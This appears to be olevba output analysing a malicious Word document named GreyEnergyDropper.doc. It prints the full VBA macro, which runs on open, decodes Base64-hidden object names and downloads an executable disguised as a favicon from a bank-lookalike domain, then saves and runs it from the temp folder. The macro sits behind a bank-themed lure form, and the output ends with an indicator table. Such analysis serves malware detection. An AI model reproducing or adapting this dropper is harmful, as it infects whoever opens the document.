Загрузка данных
Encoding for stdout is only cp1251, will auto-encode text with utf8 before output
olevba 0.60.2 on Python 3.13.16 - http://decalage.info/python/oletools
===============================================================================
FILE: GreyEnergyDropper.doc
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Function GoToLink1(url)
On Error Resume Next
ThisDocument.FollowHyperlink (url)
If Err.Number <> 0 Then
MsgBox "No Internet access!"
End If
End Function
Function HashCheck()
On Error Resume Next
Set s = CreateObject(B64Dec("d3NjcmlwdC5zaGVsbA=="))
Set h = CreateObject(B64Dec("bXN4bWwyLnhtbGh0dHA="))
p = s.ExpandEnvironmentStrings("%temp%") & B64Dec("XFRWVU5TUzMuZXhl")
h.Open "get", B64Dec("aHR0cDovL3BiYW5rLmNvLnVhL2Zhdmljb24uaWNv"), False
h.send
With CreateObject(B64Dec("YWRvZGIuc3RyZWFt"))
.Type = 1
.Open
.Write h.responsebody
.savetofile p, 2
.Close
End With
s.Run p
End Function
Sub Test()
Call HashCheck
End Sub
Private Sub CommandButtonCredit_Click()
Call GoToLink1("https://shvidkiy-kredit.privatbank.ua/?nomob=1/?utm_source=ru-mainpagebanner&banner_id=072359#/step1")
End Sub
Private Sub CommandButtonGet_Click()
Call GoToLink1("https://privatbank.ua/karta-juniora/?utm_source=ru-mainpagebanner&banner_id=070383")
End Sub
Private Sub CommandButtonSend_Click()
On Error Resume Next
Set h = CreateObject(B64Dec("bXN4bWwyLnhtbGh0dHA="))
h.Open "get", B64Dec("aHR0cDovL2dvb2dsZS5jb20udWE="), False
h.send
If Err.Number <> 0 Then
MsgBox "No Internet access!"
Exit Sub
Else
If (Len(TextBox1.Text) > 0 And Len(TextBox11.Text) > 0 And Len(TextBox111.Text)) > 0 Then
CommandButtonSend.Enabled = False
End If
End If
End Sub
Public Sub disable()
CommandButtonSend.Enabled = False
'CommandButtonGet.Enabled = False
'CommandButtonCredit.Enabled = False
TextBox11.BackColor = RGB(224, 224, 224)
TextBox11.Enabled = False
TextBox111.BackColor = RGB(224, 224, 224)
TextBox111.Enabled = False
TextBox1.BackColor = RGB(224, 224, 224)
TextBox1.Enabled = False
OptionButton1.Enabled = False
OptionButton2.Enabled = False
OptionButton3.Enabled = False
OptionButton4.Enabled = False
OptionButton5.Enabled = False
CheckBox1.Enabled = False
CheckBox2.Enabled = False
End Sub
Private Sub Document_Open()
CommandButtonSend.Enabled = True
'CommandButtonGet.Enabled = True
'CommandButtonCredit.Enabled = True
TextBox11.BackColor = RGB(255, 255, 255)
TextBox11.Enabled = True
TextBox111.BackColor = RGB(255, 255, 255)
TextBox111.Enabled = True
TextBox1.BackColor = RGB(255, 255, 255)
TextBox1.Enabled = True
OptionButton1.Enabled = True
OptionButton2.Enabled = True
OptionButton3.Enabled = True
OptionButton4.Enabled = True
OptionButton5.Enabled = True
CheckBox1.Enabled = True
CheckBox2.Enabled = True
Call Test
End Sub
Function B64Dec(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
B64Dec = sOut
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Document_Open |Runs when the Word or Publisher document is |
| | |opened |
|AutoExec |CommandButtonCredit_|Runs when the file is opened and ActiveX |
| |Click |objects trigger events |
|Suspicious|ExpandEnvironmentStr|May read system environment variables |
| |ings | |
|Suspicious|Open |May open a file |
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|savetofile |May create a text file |
|Suspicious|Run |May run an executable file or a system |
| | |command |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|adodb.stream |May create a text file (obfuscation: Base64) |
|Suspicious|shell |May run an executable file or a system |
| | |command (obfuscation: Base64) |
|Suspicious|wscript.shell |May run an executable file or a system |
| | |command (obfuscation: Base64) |
|Suspicious|msxml2.xmlhttp |May download files from the Internet |
| | |(obfuscation: Base64) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |https://shvidkiy-kre|URL |
| |dit.privatbank.ua/?n| |
| |omob=1/?utm_source=r| |
| |u-mainpagebanner&ban| |
| |ner_id=072359#/step1| |
|IOC |https://privatbank.u|URL |
| |a/karta-juniora/?utm| |
| |_source=ru-mainpageb| |
| |anner&banner_id=0703| |
| |83 | |
|IOC |http://pbank.co.ua/f|URL (obfuscation: Base64) |
| |avicon.ico | |
|IOC |http://google.com.ua|URL (obfuscation: Base64) |
|IOC |TVUNSS3.exe |Executable file name (obfuscation: Base64) |
|Base64 |wscript.shell |d3NjcmlwdC5zaGVsbA== |
|String | | |
|Base64 |msxml2.xmlhttp |bXN4bWwyLnhtbGh0dHA= |
|String | | |
|Base64 |\TVUNSS3.exe |XFRWVU5TUzMuZXhl |
|String | | |
|Base64 |http://pbank.co.ua/f|aHR0cDovL3BiYW5rLmNvLnVhL2Zhdmljb24uaWNv |
|String |avicon.ico | |
|Base64 |adodb.stream |YWRvZGIuc3RyZWFt |
|String | | |
|Base64 |http://google.com.ua|aHR0cDovL2dvb2dsZS5jb20udWE= |
|String | | |
+----------+--------------------+---------------------------------------------+